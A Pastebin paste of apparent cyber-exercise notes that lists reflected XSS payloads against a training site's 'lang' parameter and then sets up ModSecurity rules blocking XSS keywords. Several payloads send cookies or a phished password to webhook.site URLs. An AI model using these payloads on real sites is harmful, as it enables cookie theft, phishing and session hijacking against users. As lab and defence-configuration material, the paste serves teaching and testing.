Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <script>alert(1)</script>
- ');alert(1);//
- http://gplx.teamxx.dientap.cnsc/hoidap.html?lang=');document.write('<h1>Xin chao DHQG 2019</h1>')//
- http://gplx.teamxx.dientap.cnsc/hoidap.html?lang=');var pass =prompt("Nhập mật khẩu để tiếp tục", "password");document.write('<img src="https://webhook.site/448dcf26-0d84-4e49-9ffa-940fdb861553?pass='%2Bpass%2B'">')//
- http://gplx.teamxx.dientap.cnsc/hoidap.html?lang=');document.getElementsByClassName('path')[0].innerHTML='<img src="https://www.switch.ch/export/sites/default/security/.galleries/images/Hack-the-Hacker-photo-by-istockphoto-gorodenkoff.jpg">'//
- http://gplx.teamxx.dientap.cnsc/hoidap.html?lang=');document.write('<img src="https://webhook.site/448dcf26-0d84-4e49-9ffa-940fdb861553?cookie'%2Bdocument.cookie%2B'">')//
- <script>window.location="http://webhook.site/80aeac02-68fc-46b8-82fc-71910f4e110f?"+document.cookie</script>
- sudo nano /usr/share/modsecurity-crs/new_rules/modsecurity_xssurl.conf
- <IfModule security2_module>
- SecRuleEngine On
- SecDefaultAction "phase:2,deny,log,status:403"
- SecRule REQUEST_URI "Jscript|alert|onerror|document|javascript|script|window" "deny,phase:1,log,id:10000"
- </IfModule>
- cd /usr/share/modsecurity-crs/activated_rules
- sudo ln –s ../new_rules/modsecurity_xssurl.conf
- sudo service apache2 restart
- cat /var/log/apache2/modsec_audit.log
- cd /usr/share/modsecurity-crs/
- sudo nano /usr/share/modsecurity-crs/new_rules/modsecurity_xss_body.conf
- <IfModule security2_module>
- SecRuleEngine On
- SecDefaultAction "phase:2,deny,log,status:403"
- SecRule REQUEST_BODY "Jscript|alert|onerror|document|javascript|script|window" "deny,phase:2,log,id:10001"
- </IfModule>
- cd /usr/share/modsecurity-crs/activated_rules
- sudo ln –s ../new_rules/modsecurity_xss_body.conf
- sudo service apache2 restart
- cat /var/log/apache2/modsec_audit.log
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
